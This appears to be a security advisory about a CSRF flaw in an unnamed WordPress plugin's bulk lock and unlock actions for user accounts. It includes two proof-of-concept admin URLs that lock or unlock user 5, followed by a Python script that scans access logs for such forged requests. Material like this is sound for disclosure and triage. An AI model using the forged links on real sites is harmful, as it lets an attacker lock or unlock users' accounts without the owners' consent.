Description

The plugin does not have a CSRF check when bulk locking and unlocking accounts, which could allow attackers to make logged-in admins lock and unlock arbitrary users via a CSRF attack.
Make a logged-in admin open one of the links below; this will make them lock/unlock the user with ID 5:
https://example.com/wp-admin/users.php?action=lock&action2=lock&users%5B0%5D=5
https://example.com/wp-admin/users.php?action=unlock&action2=unlock&users%5B0%5D=5
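
For triage on a site that ran the affected plugin, the following added example (not part of the advisory or the plugin's code) scans web server access logs for lock/unlock requests shaped like the links above. It assumes combined log format, a site host of example.com, and that a bulk action submitted from the WordPress users screen carries a `_wpnonce` parameter; the log lines are constructed samples.

```python
import re
from urllib.parse import parse_qs, urlsplit

SITE_HOST = "example.com"          # assumption: the site's own host name
BULK_ACTIONS = {"lock", "unlock"}  # the two actions named in the advisory

# Combined log format: "METHOD target PROTO" status size "referer" "agent"
LINE_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"'
)

def suspicious_reason(line):
    """Return why a log line looks like a forged lock/unlock request, or None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    params = parse_qs(url.query)  # decodes users%5B0%5D to users[0]
    actions = set(params.get("action", []) + params.get("action2", []))
    has_users = any(k == "users" or k.startswith("users[") for k in params)
    if not (url.path.endswith("/wp-admin/users.php")
            and actions & BULK_ACTIONS and has_users):
        return None
    if "_wpnonce" not in params:
        return "no _wpnonce parameter"
    referer = m["referer"]
    # An absent Referer is common for privacy reasons, so only a foreign one counts.
    if referer not in ("", "-") and urlsplit(referer).hostname != SITE_HOST:
        return f"referer host {urlsplit(referer).hostname!r} is not {SITE_HOST!r}"
    return None

def scan(lines):
    """Return (line_number, reason) for every flagged line."""
    return [(i, r) for i, l in enumerate(lines, 1) if (r := suspicious_reason(l))]

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/users.php?_wpnonce=0123456789&action=lock&users%5B%5D=5&action2=lock HTTP/1.1" 302 0 "https://example.com/wp-admin/users.php" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:05:00 +0000] "GET /wp-admin/users.php?action=lock&action2=lock&users%5B0%5D=5 HTTP/1.1" 302 0 "https://other-site.invalid/page" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:06:00 +0000] "GET /wp-admin/users.php?action=unlock&action2=unlock&users%5B0%5D=5 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:07:00 +0000] "GET /wp-admin/users.php?role=subscriber HTTP/1.1" 200 5120 "https://example.com/wp-admin/" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:08:00 +0000] "GET /wp-admin/users.php?_wpnonce=0123456789&action=unlock&users%5B%5D=5 HTTP/1.1" 302 0 "https://other-site.invalid/page" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, reason in scan(SAMPLE_LOG):
        print(f"line {number}: {reason}")
```

A flagged line is a lead for review, not proof of abuse; compare its timestamp with the user lock state changes recorded on the site.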